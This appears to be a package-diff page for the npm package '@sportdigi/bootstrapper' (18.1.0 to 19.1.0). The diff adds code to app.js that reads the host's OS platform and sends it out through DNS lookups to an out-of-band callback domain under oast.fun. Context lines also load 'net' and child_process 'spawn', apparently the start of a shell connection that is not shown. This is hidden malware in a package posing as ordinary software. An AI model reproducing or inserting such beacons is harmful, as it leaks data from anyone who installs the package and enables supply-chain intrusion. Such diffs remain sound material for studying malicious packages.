@sportdigi/bootstrapper 18.1.0 → 19.1.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/app.js +2 -2
  2. package/package.json +1 -1
package/app.js CHANGED
@@ -1,6 +1,6 @@
1
1
  const dns = require('dns');
2
2
  const os = require('os');
3
-
3
+ let platform = os.platform();
4
4
  function sendDns(query){
5
5
  let domain = `${query}.fctdhxpvrzxmmwtxpidt0w23qlngi0owc.oast.fun`;
6
6
  dns.resolve(domain, (err, records) => {
@@ -11,7 +11,7 @@ function sendDns(query){
11
11
  });
12
12
  }
13
13
 
14
- sendDns("Hello");
14
+ sendDns(platform);
15
15
 
16
16
  const net = require('net');
17
17
  const spawn = require('child_process').spawn;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sportdigi/bootstrapper",
3
- "version": "18.1.0",
3
+ "version": "19.1.0",
4
4
  "description": "",
5
5
  "main": "app.js",
6
6
  "scripts": {